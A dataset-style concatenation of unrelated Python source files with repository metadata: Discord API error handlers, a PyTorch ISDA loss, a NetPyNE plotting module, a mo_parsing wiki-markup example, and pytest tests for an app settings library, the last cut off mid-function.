83a9563d210718071d4e2cdcca3b212c87abaf51
[ "MIT" ]
1
2018-04-15T13:24:44.000Z
2018-04-15T13:24:44.000Z
from typing import TYPE_CHECKING if TYPE_CHECKING: from Platforms.Web.main_web import PhaazebotWeb import json from aiohttp.web import Response from Utils.Classes.extendedrequest import ExtendedRequest async def apiDiscordConfigsQuoteDisabledChannelExists(cls:"PhaazebotWeb", WebRequest:ExtendedRequest, **kwargs) -> Response: """ Optional keywords: ------------------ * msg `str` : (Default: None) * [Overwrites default] * channel_id `str` * * channel_name `str` * Default message (*gets altered by optional keywords): ---------------------------------------------------- Disabled quote channel already exists """ res:dict = dict(status=400, error="discord_disabled_regularchannel_exists") channel_id:str = kwargs.get("channel_id", "") if channel_id: res["channel_id"] = str(channel_id) channel_name:str = kwargs.get("channel_name", "") if channel_name: res["channel_name"] = str(channel_name) # build message default_msg:str = "Disabled quote channel already exists" if channel_name: default_msg += f" for '{channel_name}'" if channel_id: default_msg += f" (Channel ID:{channel_id})" msg:str = kwargs.get("msg", default_msg) res["msg"] = msg cls.BASE.Logger.debug(f"(API/Discord) 400 Channel exists: {WebRequest.path}", require="api:400") return cls.response( text=json.dumps(res), content_type="application/json", status=400 ) async def apiDiscordConfigsQuoteDisabledChannelNotExists(cls:"PhaazebotWeb", WebRequest:ExtendedRequest, **kwargs) -> Response: """ Optional keywords: ------------------ * msg `str` : (Default: None) * [Overwrites default] * channel_id `str` * * channel_name `str` * Default message (*gets altered by optional keywords): ---------------------------------------------------- Disabled quote channel does not exists """ res:dict = dict(status=400, error="discord_disabled_regularchannel_not_exists") channel_id:str = kwargs.get("channel_id", "") if channel_id: res["channel_id"] = str(channel_id) channel_name:str = kwargs.get("channel_name", "") if channel_name: res["channel_name"] = str(channel_name) # build message default_msg:str = "Disabled quote channel does not exists" if channel_name: default_msg += f" for '{channel_name}'" if channel_id: default_msg += f" (Channel ID:{channel_id})" msg:str = kwargs.get("msg", default_msg) res["msg"] = msg cls.BASE.Logger.debug(f"(API/Discord) 400 Channel does not exists: {WebRequest.path}", require="api:400") return cls.response( text=json.dumps(res), content_type="application/json", status=400 )
28.577778
127
0.691291
0
0
0
0
0
0
2,364
0.919129
1,225
0.476283
4c59684045a1dab8436432732a93183e33f7d39d
3,853
py
Python
augmentation/ISDA.py
RichardScottOZ/sota-data-augmentation-and-optimizers
60128ca762ac2864a3b54c43c36d1d5aa2033e5a
[ "MIT" ]
31
2020-01-14T20:03:31.000Z
2022-01-07T08:02:09.000Z
augmentation/ISDA.py
RichardScottOZ/sota-data-augmentation-and-optimizers
60128ca762ac2864a3b54c43c36d1d5aa2033e5a
[ "MIT" ]
null
null
null
augmentation/ISDA.py
RichardScottOZ/sota-data-augmentation-and-optimizers
60128ca762ac2864a3b54c43c36d1d5aa2033e5a
[ "MIT" ]
6
2020-03-04T09:31:45.000Z
2021-11-21T18:47:15.000Z
import torch import torch.nn as nn class EstimatorCV(): def __init__(self, feature_num, class_num): super(EstimatorCV, self).__init__() self.class_num = class_num self.CoVariance = torch.zeros(class_num, feature_num, feature_num)#.cuda() self.Ave = torch.zeros(class_num, feature_num)#.cuda() self.Amount = torch.zeros(class_num)#.cuda() def update_CV(self, features, labels): N = features.size(0) C = self.class_num A = features.size(1) NxCxFeatures = features.view( N, 1, A ).expand( N, C, A ) onehot = torch.zeros(N, C)#.cuda() onehot.scatter_(1, labels.view(-1, 1), 1) NxCxA_onehot = onehot.view(N, C, 1).expand(N, C, A) features_by_sort = NxCxFeatures.mul(NxCxA_onehot) Amount_CxA = NxCxA_onehot.sum(0) Amount_CxA[Amount_CxA == 0] = 1 ave_CxA = features_by_sort.sum(0) / Amount_CxA var_temp = features_by_sort - \ ave_CxA.expand(N, C, A).mul(NxCxA_onehot) var_temp = torch.bmm( var_temp.permute(1, 2, 0), var_temp.permute(1, 0, 2) ).div(Amount_CxA.view(C, A, 1).expand(C, A, A)) sum_weight_CV = onehot.sum(0).view(C, 1, 1).expand(C, A, A) sum_weight_AV = onehot.sum(0).view(C, 1).expand(C, A) weight_CV = sum_weight_CV.div( sum_weight_CV + self.Amount.view(C, 1, 1).expand(C, A, A) ) weight_CV[weight_CV != weight_CV] = 0 weight_AV = sum_weight_AV.div( sum_weight_AV + self.Amount.view(C, 1).expand(C, A) ) weight_AV[weight_AV != weight_AV] = 0 additional_CV = weight_CV.mul(1 - weight_CV).mul( torch.bmm( (self.Ave - ave_CxA).view(C, A, 1), (self.Ave - ave_CxA).view(C, 1, A) ) ) self.CoVariance = (self.CoVariance.mul(1 - weight_CV) + var_temp .mul(weight_CV)).detach() + additional_CV.detach() self.Ave = (self.Ave.mul(1 - weight_AV) + ave_CxA.mul(weight_AV)).detach() self.Amount += onehot.sum(0) class ISDALoss(nn.Module): def __init__(self, feature_num, class_num): super(ISDALoss, self).__init__() self.estimator = EstimatorCV(feature_num, class_num) self.class_num = class_num self.cross_entropy = nn.CrossEntropyLoss() def isda_aug(self, fc, features, y, labels, cv_matrix, ratio): N = features.size(0) C = self.class_num A = features.size(1) weight_m = list(fc.parameters())[0] NxW_ij = weight_m.expand(N, C, A) NxW_kj = torch.gather(NxW_ij, 1, labels.view(N, 1, 1) .expand(N, C, A)) CV_temp = cv_matrix[labels] # sigma2 = ratio * \ # torch.bmm(torch.bmm(NxW_ij - NxW_kj, # CV_temp).view(N * C, 1, A), # (NxW_ij - NxW_kj).view(N * C, A, 1)).view(N, C) sigma2 = ratio * \ torch.bmm(torch.bmm(NxW_ij - NxW_kj, CV_temp), (NxW_ij - NxW_kj).permute(0, 2, 1)) sigma2 = sigma2.mul(torch.eye(C)#.cuda() .expand(N, C, C)).sum(2).view(N, C) aug_result = y + 0.5 * sigma2 return aug_result def forward(self, model, fc, x, target_x, ratio): features = model(x) y = fc(features) self.estimator.update_CV(features.detach(), target_x) isda_aug_y = self.isda_aug(fc, features, y, target_x, self.estimator.CoVariance.detach(), ratio) loss = self.cross_entropy(isda_aug_y, target_x) return loss, y
29.868217
104
0.536465
3,812
0.989359
0
0
0
0
0
0
233
0.060472
4c59cbad1a1c628d8be0abf3472039d2b0fe36c6
22,828
py
Python
netpyne/plotting/plotter.py
sanjayankur31/netpyne
d8b7e94cabeb27e23e30853ff17ae86518b35ac2
[ "MIT" ]
null
null
null
netpyne/plotting/plotter.py
sanjayankur31/netpyne
d8b7e94cabeb27e23e30853ff17ae86518b35ac2
[ "MIT" ]
null
null
null
netpyne/plotting/plotter.py
sanjayankur31/netpyne
d8b7e94cabeb27e23e30853ff17ae86518b35ac2
[ "MIT" ]
null
null
null
""" Module for plotting analyses """ import matplotlib as mpl import matplotlib.pyplot as plt import numpy as np from copy import deepcopy import pickle, json import os from matplotlib.offsetbox import AnchoredOffsetbox try: basestring except NameError: basestring = str colorList = [[0.42, 0.67, 0.84], [0.90, 0.76, 0.00], [0.42, 0.83, 0.59], [0.90, 0.32, 0.00], [0.34, 0.67, 0.67], [0.90, 0.59, 0.00], [0.42, 0.82, 0.83], [1.00, 0.85, 0.00], [0.33, 0.67, 0.47], [1.00, 0.38, 0.60], [0.57, 0.67, 0.33], [0.50, 0.20, 0.00], [0.71, 0.82, 0.41], [0.00, 0.20, 0.50], [0.70, 0.32, 0.10]] * 3 class MetaFigure: """A class which defines a figure object""" def __init__(self, kind, sim=None, subplots=None, rcParams=None, autosize=0.35, **kwargs): if not sim: from .. import sim self.sim = sim self.kind = kind # Make a copy of the current matplotlib rcParams and update them self.orig_rcParams = deepcopy(mpl.rcParamsDefault) if rcParams: for rcParam in rcParams: if rcParam in mpl.rcParams: mpl.rcParams[rcParam] = rcParams[rcParam] else: print(rcParam, 'not found in matplotlib.rcParams') self.rcParams = rcParams else: self.rcParams = self.orig_rcParams # Set up any subplots if not subplots: nrows = 1 ncols = 1 elif type(subplots) == int: nrows = subplots ncols = 1 elif type(subplots) == list: nrows = subplots[0] ncols = subplots[1] # Create figure if 'figSize' in kwargs: figSize = kwargs['figSize'] else: figSize = self.rcParams['figure.figsize'] if 'dpi' in kwargs: dpi = kwargs['dpi'] else: dpi = self.rcParams['figure.dpi'] if autosize: maxplots = np.max([nrows, ncols]) figSize0 = figSize[0] + (maxplots-1)*(figSize[0]*autosize) figSize1 = figSize[1] + (maxplots-1)*(figSize[1]*autosize) figSize = [figSize0, figSize1] self.fig, self.ax = plt.subplots(nrows, ncols, figsize=figSize, dpi=dpi) self.plotters = [] def saveFig(self, sim=None, fileName=None, fileDesc=None, fileType='png', fileDir=None, overwrite=True, **kwargs): """ 'eps': 'Encapsulated Postscript', 'jpg': 'Joint Photographic Experts Group', 'jpeg': 'Joint Photographic Experts Group', 'pdf': 'Portable Document Format', 'pgf': 'PGF code for LaTeX', 'png': 'Portable Network Graphics', 'ps': 'Postscript', 'raw': 'Raw RGBA bitmap', 'rgba': 'Raw RGBA bitmap', 'svg': 'Scalable Vector Graphics', 'svgz': 'Scalable Vector Graphics', 'tif': 'Tagged Image File Format', 'tiff': 'Tagged Image File Format' """ if not sim: from .. import sim if fileDesc is not None: fileDesc = '_' + str(fileDesc) else: fileDesc = '_' + self.kind if fileType not in self.fig.canvas.get_supported_filetypes(): raise Exception('fileType not recognized in saveFig') else: fileExt = '.' + fileType if not fileName or not isinstance(fileName, basestring): fileName = self.sim.cfg.filename + fileDesc + fileExt else: if fileName.endswith(fileExt): fileName = fileName.split(fileExt)[0] + fileDesc + fileExt else: fileName = fileName + fileDesc + fileExt if fileDir is not None: fileName = os.path.join(fileDir, fileName) if not overwrite: while os.path.isfile(fileName): try: fileNumStr = fileName.split(fileExt)[0].split('_')[-1] fileNumStrNew = str(int(fileNumStr) + 1).zfill(2) fileName = fileName.split('_' + fileNumStr)[0] except: fileNumStr = fileNumStrNew = '01' fileName = fileName.split(fileExt)[0] fileName = fileName.split(fileNumStr)[0] + '_' + fileNumStrNew + fileExt self.fig.savefig(fileName) self.fileName = fileName return fileName def showFig(self, **kwargs): try: self.fig.show(block=False) except: self.fig.show() def addSuptitle(self, **kwargs): self.fig.suptitle(**kwargs) def finishFig(self, **kwargs): if 'suptitle' in kwargs: if kwargs['suptitle']: self.addSuptitle(**kwargs['suptitle']) if 'tightLayout' not in kwargs: plt.tight_layout() elif kwargs['tightLayout']: plt.tight_layout() if 'saveFig' in kwargs: if kwargs['saveFig']: self.saveFig(**kwargs) if 'showFig' in kwargs: if kwargs['showFig']: self.showFig(**kwargs) else: plt.close(self.fig) # Reset the matplotlib rcParams to their original settings mpl.style.use(self.orig_rcParams) class GeneralPlotter: """A class used for plotting""" def __init__(self, data, kind, axis=None, sim=None, rcParams=None, metafig=None, **kwargs): """ Parameters ---------- data : dict, str axis : matplotlib axis The axis to plot into. If axis is set to None, a new figure and axis are created and plotted into. If plotting into an existing axis, more options are available: xtwin, ytwin, """ self.kind = kind # Load data if type(data) == str: if os.path.isfile(data): self.data = self.loadData(data) else: raise Exception('In Plotter, if data is a string, it must be the path to a data file.') else: self.data = data if not sim: from .. import sim self.sim = sim self.axis = axis if metafig: self.metafig = metafig # If an axis is input, plot there; otherwise make a new figure and axis if self.axis is None: final = True self.metafig = MetaFigure(kind=self.kind, **kwargs) self.fig = self.metafig.fig self.axis = self.metafig.ax else: self.fig = self.axis.figure # Attach plotter to its MetaFigure self.metafig.plotters.append(self) def loadData(self, fileName, fileDir=None, sim=None): from ..analysis import loadData self.data = loadData(fileName=fileName, fileDir=fileDir, sim=None) def saveData(self, fileName=None, fileDesc=None, fileType=None, fileDir=None, sim=None, **kwargs): from ..analysis import saveData as saveFigData saveFigData(self.data, fileName=fileName, fileDesc=fileDesc, fileType=fileType, fileDir=fileDir, sim=sim, **kwargs) def formatAxis(self, **kwargs): if 'title' in kwargs: self.axis.set_title(kwargs['title']) if 'xlabel' in kwargs: self.axis.set_xlabel(kwargs['xlabel']) if 'ylabel' in kwargs: self.axis.set_ylabel(kwargs['ylabel']) if 'xlim' in kwargs: if kwargs['xlim'] is not None: self.axis.set_xlim(kwargs['xlim']) if 'ylim' in kwargs: if kwargs['ylim'] is not None: self.axis.set_ylim(kwargs['ylim']) if 'invert_yaxis' in kwargs: if kwargs['invert_yaxis'] is True: self.axis.invert_yaxis() def addLegend(self, handles=None, labels=None, **kwargs): legendParams = ['loc', 'bbox_to_anchor', 'fontsize', 'numpoints', 'scatterpoints', 'scatteryoffsets', 'markerscale', 'markerfirst', 'frameon', 'fancybox', 'shadow', 'framealpha', 'facecolor', 'edgecolor', 'mode', 'bbox_transform', 'title', 'title_fontsize', 'borderpad', 'labelspacing', 'handlelength', 'handletextpad', 'borderaxespad', 'columnspacing', 'handler_map'] # Check for and apply any legend parameters in the kwargs legendKwargs = {} for kwarg in kwargs: if kwarg in legendParams: legendKwargs[kwarg] = kwargs[kwarg] # If 'legendKwargs' is found in kwargs, use those values instead of the defaults if 'legendKwargs' in kwargs: legendKwargs_new = kwargs['legendKwargs'] for key in legendKwargs_new: if key in legendParams: legendKwargs[key] = legendKwargs_new[key] cur_handles, cur_labels = self.axis.get_legend_handles_labels() if not handles: handles = cur_handles if not labels: labels = cur_labels self.axis.legend(handles, labels, **legendKwargs) def addScalebar(self, matchx=True, matchy=True, hidex=True, hidey=True, unitsx=None, unitsy=None, scalex=1.0, scaley=1.0, xmax=None, ymax=None, space=None, **kwargs): add_scalebar(self.axis, matchx=matchx, matchy=matchy, hidex=hidex, hidey=hidey, unitsx=unitsx, unitsy=unitsy, scalex=scalex, scaley=scaley, xmax=xmax, ymax=ymax, space=space, **kwargs) def addColorbar(self, **kwargs): plt.colorbar(mappable=self.axis.get_images()[0], ax=self.axis, **kwargs) def finishAxis(self, **kwargs): self.formatAxis(**kwargs) if 'saveData' in kwargs: if kwargs['saveData']: self.saveData(**kwargs) if 'dpi' in kwargs: if kwargs['dpi']: self.fig.set_dpi(kwargs['dpi']) if 'figSize' in kwargs: if kwargs['figSize']: self.fig.set_size_inches(kwargs['figSize']) if 'legend' in kwargs: if kwargs['legend'] is True: self.addLegend(**kwargs) elif type(kwargs['legend']) == dict: self.addLegend(**kwargs['legend']) if 'scalebar' in kwargs: if kwargs['scalebar'] is True: self.addScalebar() elif type(kwargs['scalebar']) == dict: self.addScalebar(**kwargs['scalebar']) if 'colorbar' in kwargs: if kwargs['colorbar'] is True: self.addColorbar() elif type(kwargs['colorbar']) == dict: self.addColorbar(**kwargs['colorbar']) if 'grid' in kwargs: self.axis.minorticks_on() if kwargs['grid'] is True: self.axis.grid() elif type(kwargs['grid']) == dict: self.axis.grid(**kwargs['grid']) # If this is the only axis on the figure, finish the figure if type(self.metafig.ax) != list: self.metafig.finishFig(**kwargs) # Reset the matplotlib rcParams to their original settings mpl.style.use(self.metafig.orig_rcParams) class ScatterPlotter(GeneralPlotter): """A class used for scatter plotting""" def __init__(self, data, axis=None, **kwargs): super().__init__(data=data, axis=axis, **kwargs) self.kind = 'scatter' self.x = data.get('x') self.y = data.get('y') self.s = data.get('s') self.c = data.get('c') self.marker = data.get('marker') self.linewidth = data.get('linewidth') self.cmap = data.get('cmap') self.norm = data.get('norm') self.alpha = data.get('alpha') self.linewidths = data.get('linewidths') def plot(self, **kwargs): scatterPlot = self.axis.scatter(x=self.x, y=self.y, s=self.s, c=self.c, marker=self.marker, linewidth=self.linewidth, cmap=self.cmap, norm=self.norm, alpha=self.alpha, linewidths=self.linewidths) self.finishAxis(**kwargs) return self.fig class LinePlotter(GeneralPlotter): """A class used for plotting one line per subplot""" def __init__(self, data, axis=None, options={}, **kwargs): super().__init__(data=data, axis=axis, **kwargs) self.kind = 'line' self.x = np.array(data.get('x')) self.y = np.array(data.get('y')) self.color = data.get('color') self.marker = data.get('marker') self.markersize = data.get('markersize') self.linewidth = data.get('linewidth') self.alpha = data.get('alpha') def plot(self, **kwargs): linePlot = self.axis.plot(self.x, self.y, color=self.color, marker=self.marker, markersize=self.markersize, linewidth=self.linewidth, alpha=self.alpha) self.finishAxis(**kwargs) return self.fig class LinesPlotter(GeneralPlotter): """A class used for plotting multiple lines on the same axis""" def __init__(self, data, axis=None, options={}, **kwargs): super().__init__(data=data, axis=axis, **kwargs) self.kind = 'lines' self.x = np.array(data.get('x')) self.y = np.array(data.get('y')) self.color = data.get('color') self.marker = data.get('marker') self.markersize = data.get('markersize') self.linewidth = data.get('linewidth') self.alpha = data.get('alpha') self.label = data.get('label') def plot(self, **kwargs): numLines = len(self.y) if type(self.color) != list: colors = [self.color for line in range(numLines)] else: colors = self.color if type(self.marker) != list: markers = [self.marker for line in range(numLines)] else: markers = self.marker if type(self.markersize) != list: markersizes = [self.markersize for line in range(numLines)] else: markersizes = self.markersize if type(self.linewidth) != list: linewidths = [self.linewidth for line in range(numLines)] else: linewidths = self.linewidth if type(self.alpha) != list: alphas = [self.alpha for line in range(numLines)] else: alphas = self.alpha if self.label is None: labels = [None for line in range(numLines)] else: labels = self.label for index, line in enumerate(self.y): self.axis.plot( self.x, self.y[index], color=colors[index], marker=markers[index], markersize=markersizes[index], linewidth=linewidths[index], alpha=alphas[index], label=labels[index], ) self.finishAxis(**kwargs) return self.fig class HistPlotter(GeneralPlotter): """A class used for histogram plotting""" def __init__(self, data, axis=None, options={}, **kwargs): super().__init__(data=data, axis=axis, **kwargs) self.kind = 'histogram' self.x = data.get('x') self.bins = data.get('bins', None) self.range = data.get('range', None) self.density = data.get('density', False) self.weights = data.get('weights', None) self.cumulative = data.get('cumulative', False) self.bottom = data.get('bottom', None) self.histtype = data.get('histtype', 'bar') self.align = data.get('align', 'mid') self.orientation = data.get('orientation', 'vertical') self.rwidth = data.get('rwidth', None) self.log = data.get('log', False) self.color = data.get('color', None) self.alpha = data.get('alpha', None) self.label = data.get('label', None) self.stacked = data.get('stacked', False) self.data = data.get('data', None) def plot(self, **kwargs): histPlot = self.axis.hist(self.x, bins=self.bins, range=self.range, density=self.density, weights=self.weights, cumulative=self.cumulative, bottom=self.bottom, histtype=self.histtype, align=self.align, orientation=self.orientation, rwidth=self.rwidth, log=self.log, color=self.color, alpha=self.alpha, label=self.label, stacked=self.stacked, data=self.data) self.finishAxis(**kwargs) return self.fig class ImagePlotter(GeneralPlotter): """A class used for image plotting using plt.imshow""" def __init__(self, data, axis=None, options={}, **kwargs): super().__init__(data=data, axis=axis, **kwargs) self.kind = 'image' self.X = data.get('X') self.cmap = data.get('cmap', None) self.norm = data.get('norm', None) self.aspect = data.get('aspect', None) self.interpolation = data.get('interpolation', None) self.alpha = data.get('alpha', None) self.vmin = data.get('vmin', None) self.vmax = data.get('vmax', None) self.origin = data.get('origin', None) self.extent = data.get('extent', None) self.aspect = data.get('aspect', None) self.interpolation = data.get('interpolation', None) self.filternorm = data.get('filternorm', True) self.filterrad = data.get('filterrad', 4.0) self.resample = data.get('resample', None) self.url = data.get('url', None) self.data = data.get('data', None) def plot(self, **kwargs): imagePlot = self.axis.imshow(self.X, cmap=self.cmap, norm=self.norm, aspect=self.aspect, interpolation=self.interpolation, alpha=self.alpha, vmin=self.vmin, vmax=self.vmax, origin=self.origin, extent=self.extent, filternorm=self.filternorm, filterrad=self.filterrad, resample=self.resample, url=self.url, data=self.data) self.finishAxis(**kwargs) return self.fig class AnchoredScaleBar(AnchoredOffsetbox): """ A class used for adding scale bars to plots """ def __init__(self, axis, sizex=0, sizey=0, labelx=None, labely=None, loc=4, pad=0.1, borderpad=0.1, sep=2, prop=None, barcolor="black", barwidth=None, **kwargs): """ Draw a horizontal and/or vertical bar with the size in data coordinate of the give axes. A label will be drawn underneath (center-aligned). - transform : the coordinate frame (typically axes.transData) - sizex,sizey : width of x,y bar, in data units. 0 to omit - labelx,labely : labels for x,y bars; None to omit - loc : position in containing axes - pad, borderpad : padding, in fraction of the legend font size (or prop) - sep : separation between labels and bars in points. - **kwargs : additional arguments passed to base class constructor """ from matplotlib.patches import Rectangle from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea bars = AuxTransformBox(axis.transData) if sizex: if axis.xaxis_inverted(): sizex = -sizex bars.add_artist(Rectangle((0,0), sizex, 0, ec=barcolor, lw=barwidth, fc="none")) if sizey: if axis.yaxis_inverted(): sizey = -sizey bars.add_artist(Rectangle((0,0), 0, sizey, ec=barcolor, lw=barwidth, fc="none")) if sizex and labelx: self.xlabel = TextArea(labelx) bars = VPacker(children=[bars, self.xlabel], align="center", pad=0, sep=sep) if sizey and labely: self.ylabel = TextArea(labely) bars = HPacker(children=[self.ylabel, bars], align="center", pad=0, sep=sep) AnchoredOffsetbox.__init__(self, loc, pad=pad, borderpad=borderpad, child=bars, prop=prop, frameon=False, **kwargs) def add_scalebar(axis, matchx=True, matchy=True, hidex=True, hidey=True, unitsx=None, unitsy=None, scalex=1.0, scaley=1.0, xmax=None, ymax=None, space=None, **kwargs): """ Add scalebars to axes Adds a set of scale bars to *ax*, matching the size to the ticks of the plot and optionally hiding the x and y axes - axis : the axis to attach ticks to - matchx,matchy : if True, set size of scale bars to spacing between ticks, if False, set size using sizex and sizey params - hidex,hidey : if True, hide x-axis and y-axis of parent - **kwargs : additional arguments passed to AnchoredScaleBars Returns created scalebar object """ def get_tick_size(subaxis): tick_size = None tick_locs = subaxis.get_majorticklocs() if len(tick_locs)>1: tick_size = np.abs(tick_locs[1] - tick_locs[0]) return tick_size if matchx: sizex = get_tick_size(axis.xaxis) if matchy: sizey = get_tick_size(axis.yaxis) if 'sizex' in kwargs: sizex = kwargs['sizex'] if 'sizey' in kwargs: sizey = kwargs['sizey'] def autosize(value, maxvalue, scale, n=1, m=10): round_to_n = lambda value, n, m: int(np.ceil(round(value, -int(np.floor(np.log10(abs(value)))) + (n - 1)) / m)) * m while value > maxvalue: try: value = round_to_n(0.8 * maxvalue * scale, n, m) / scale except: value /= 10.0 m /= 10.0 return value if ymax is not None and sizey>ymax: sizey = autosize(sizey, ymax, scaley) if xmax is not None and sizex>xmax: sizex = autosize(sizex, xmax, scalex) kwargs['sizex'] = sizex kwargs['sizey'] = sizey if unitsx is None: unitsx = '' if unitsy is None: unitsy = '' if 'labelx' not in kwargs or kwargs['labelx'] is None: kwargs['labelx'] = '%.3g %s'%(kwargs['sizex'] * scalex, unitsx) if 'labely' not in kwargs or kwargs['labely'] is None: kwargs['labely'] = '%.3g %s'%(kwargs['sizey'] * scaley, unitsy) # add space for scalebar if space is not None: ylim0, ylim1 = axis.get_ylim() ylim = (ylim0 - space, ylim1) if ylim0 > ylim1: # if y axis is inverted ylim = (ylim0 + space, ylim1) axis.set_ylim(ylim) scalebar = AnchoredScaleBar(axis, **kwargs) axis.add_artist(scalebar) if hidex: axis.xaxis.set_visible(False) if hidey: axis.yaxis.set_visible(False) if hidex and hidey: axis.set_frame_on(False) return scalebar
34.535552
376
0.56987
19,548
0.856317
0
0
0
0
0
0
4,602
0.201595
4c5b0cb42835f92d5cfa623b7b0648900462ba33
1,069
py
Python
examples/simpleWiki.py
klahnakoski/mo-parsing
885bf3fd61430d5fa15164168b975b18988fcf9e
[ "MIT" ]
1
2021-10-30T21:18:29.000Z
2021-10-30T21:18:29.000Z
examples/simpleWiki.py
klahnakoski/mo-parsing
885bf3fd61430d5fa15164168b975b18988fcf9e
[ "MIT" ]
22
2020-04-15T14:49:30.000Z
2021-12-22T02:49:52.000Z
examples/simpleWiki.py
klahnakoski/mo-parsing
885bf3fd61430d5fa15164168b975b18988fcf9e
[ "MIT" ]
null
null
null
from mo_parsing.helpers import QuotedString wikiInput = """ Here is a simple Wiki input: *This is in italics.* **This is in bold!** ***This is in bold italics!*** Here's a URL to {{Pyparsing's Wiki Page->https://site-closed.wikispaces.com}} """ def convertToHTML(opening, closing): def conversionParseAction(t, l, s): return opening + t[0] + closing return conversionParseAction italicized = QuotedString("*").add_parse_action(convertToHTML("<I>", "</I>")) bolded = QuotedString("**").add_parse_action(convertToHTML("<B>", "</B>")) boldItalicized = QuotedString("***").add_parse_action(convertToHTML("<B><I>", "</I></B>")) def convertToHTML_A(t, l, s): try: text, url = t[0].split("->") except ValueError: raise ParseFatalException(s, l, "invalid URL link reference: " + t[0]) return '<A href="{}">{}</A>'.format(url, text) urlRef = QuotedString("{{", end_quote_char="}}").add_parse_action(convertToHTML_A) wikiMarkup = urlRef | boldItalicized | bolded | italicized
28.131579
91
0.635173
0
0
0
0
0
0
0
0
317
0.296539
4c5b215bf00e243da89ca4e94c55e9e94a7ff44a
9,885
py
Python
tests/test_app_settings_dict.py
wheelercj/app_settings
06224dec0b5baf1eeb92e5a81ca4e8385d4942a6
[ "MIT" ]
null
null
null
tests/test_app_settings_dict.py
wheelercj/app_settings
06224dec0b5baf1eeb92e5a81ca4e8385d4942a6
[ "MIT" ]
null
null
null
tests/test_app_settings_dict.py
wheelercj/app_settings
06224dec0b5baf1eeb92e5a81ca4e8385d4942a6
[ "MIT" ]
null
null
null
import pytest import re from typing import Any, Tuple from dataclasses import dataclass from app_settings_dict import Settings def test_simple_settings() -> None: settings = Settings( settings_file_path="C:/Users/chris/Documents/sample_settings_file_name.json", default_factories={ "key1": lambda: "value1", }, data={ "key1": "hello", "key2": "world", }, ) assert settings["key1"] == "hello" assert settings["key2"] == "world" del settings["key1"] del settings["key2"] assert "key1" not in settings assert "key2" not in settings assert settings["key1"] == "value1" with pytest.raises(KeyError): settings["key2"] def test_default_settings() -> None: settings = Settings( settings_file_path="sample settings file name.json", default_factories={ "key1": lambda: "value1", "key2": lambda: "value2", "key3": lambda: "value3", }, default_settings={ "key3": [], }, data={ "key1": "hello", "key2": "world", }, ) assert settings["key1"] == "hello" assert settings["key2"] == "world" assert settings["key3"] == "value3" del settings["key3"] assert settings["key3"] == "value3" settings.reset("key3") assert settings["key3"] == [] settings["key3"] = "something" assert settings["key3"] == "something" settings.reset_all() assert settings["key1"] == "hello" assert settings["key2"] == "world" assert settings["key3"] == [] def test_load_without_file() -> None: def sample_prompt_function(settings: Settings) -> Settings: # s = input("Enter the settings: ") return settings.update({"key1": "a", "key2": "b"}) settings = Settings( settings_file_path="not a real file.yaml", prompt_user_for_all_settings=sample_prompt_function, default_factories={ "key1": lambda: "value1", "key2": lambda: "value2", "key3": lambda: "value3", }, default_settings={ "key3": [], "key4": "value4", }, data={ "key1": "hello", "key2": "world", }, ) assert settings["key1"] == "hello" assert settings["key2"] == "world" assert settings["key3"] == "value3" settings.load(fallback_option="prompt user") assert settings["key1"] == "a" assert settings["key2"] == "b" assert settings["key3"] == "value3" with pytest.raises(KeyError): settings["key4"] settings.load(fallback_option="default settings") assert settings["key1"] == "a" assert settings["key2"] == "b" assert settings["key3"] == "value3" assert settings["key4"] == "value4" settings.clear() settings.load(fallback_option="default settings") assert settings["key1"] == "hello" assert settings["key2"] == "world" assert settings["key3"] == [] assert settings["key4"] == "value4" with pytest.raises(ValueError): settings.load(fallback_option="invalid option") def test_load_after_empty() -> None: settings = Settings( settings_file_path="sample settings file name.json", prompt_user_for_all_settings=lambda: 1 / 0, default_factories={ "key1": lambda: "value1", }, default_settings={ "key1": [], }, data={ "key1": "hello", }, ) assert settings["key1"] == "hello" settings.clear() assert settings["key1"] == "value1" def test_prompt() -> None: def sample_prompt_function() -> Any: # s = input("Enter a setting: ") return "a" settings = Settings( settings_file_path="sample settings file name.json", prompt_user_for_all_settings=lambda: {"key1": "a", "key2": "b"}, default_factories={ "key1": sample_prompt_function, "key2": lambda: "value2", "key3": lambda: "value3", }, default_settings={ "key3": [], }, data={ "key1": "hello", "key2": "world", }, ) assert settings["key1"] == "hello" settings.prompt("key1") assert settings["key1"] == "a" def test_changing_settings_before_load() -> None: settings = Settings( settings_file_path="sample settings file name.json", default_factories={ "key1": lambda: "value1", }, default_settings={ "key1": [], }, data={ "key1": "hello", }, ) assert settings["key1"] == "hello" settings.load(fallback_option="default settings") assert settings["key1"] == "hello" settings["key1"] = "a" settings.load(fallback_option="default settings") assert settings["key1"] == "a" def test_update() -> None: settings = Settings( settings_file_path="sample settings file name.json", default_factories={ "key1": lambda: "value1", }, default_settings={ "key1": [], }, data={ "key1": "hello", }, ) assert settings["key1"] == "hello" settings.update({"key1": "a"}) assert settings["key1"] == "a" settings.update({"key2": "b"}) assert settings["key2"] == "b" def test_Settings__is_using_json() -> None: settings = Settings( settings_file_path="sample_settings_file_name.json", default_factories={ "key1": lambda: "value1", }, data={ "key1": "hello", "key2": "world", }, ) assert settings._Settings__is_using_json() settings.settings_file_path = "sample_settings_file_name.yaml" assert not settings._Settings__is_using_json() def test_load_from_dict() -> None: settings = Settings() settings.load_from_dict( { "key1": "hello", "key2": "world", } ) assert len(settings.data) == 0 settings = Settings( data={ "key1": "a", "key2": "b", } ) settings.load_from_dict( { "key1": "c", "key2": "d", } ) assert settings.data["key1"] == "c" assert settings.data["key2"] == "d" def test_dump_to_dict() -> None: settings = Settings( settings_file_path="sample_settings_file_name.json", data={ "key1": "hello", "key2": "world", }, ) assert settings.dump_to_dict() == { "key1": "hello", "key2": "world", } def test_nested_Settings() -> None: settings = Settings( settings_file_path="sample_settings_file_name.json", default_settings={ "key6": [], "key7": Settings( data={ "key8": "value8", } ), }, data={ "key1": "hello", "key2": "world", "key3": "value3", "key4": Settings( settings_file_path="why would anyone want an inner file though.yaml", data={ "key5": "value5", }, ), }, ) assert settings.dump_to_dict() == { "key1": "hello", "key2": "world", "key3": "value3", "key4": { "key5": "value5", }, } def test_creating_setting_after_init() -> None: settings = Settings( settings_file_path="sample_settings_file_name.json", default_settings={ "key1": [], "key2": "value2", }, ) with pytest.raises(KeyError): settings["key3"] = "value3" def test_prompt_error() -> None: settings = Settings( settings_file_path="nonexistent file.json", default_settings={ "key1": [], "key2": "value2", }, ) with pytest.raises(ValueError): settings.load(fallback_option="prompt user") def test_nested_setting_loaders_and_dumpers() -> None: @dataclass class Coords: x: int y: int def __init__(self, x_and_y: Tuple[int, int]) -> 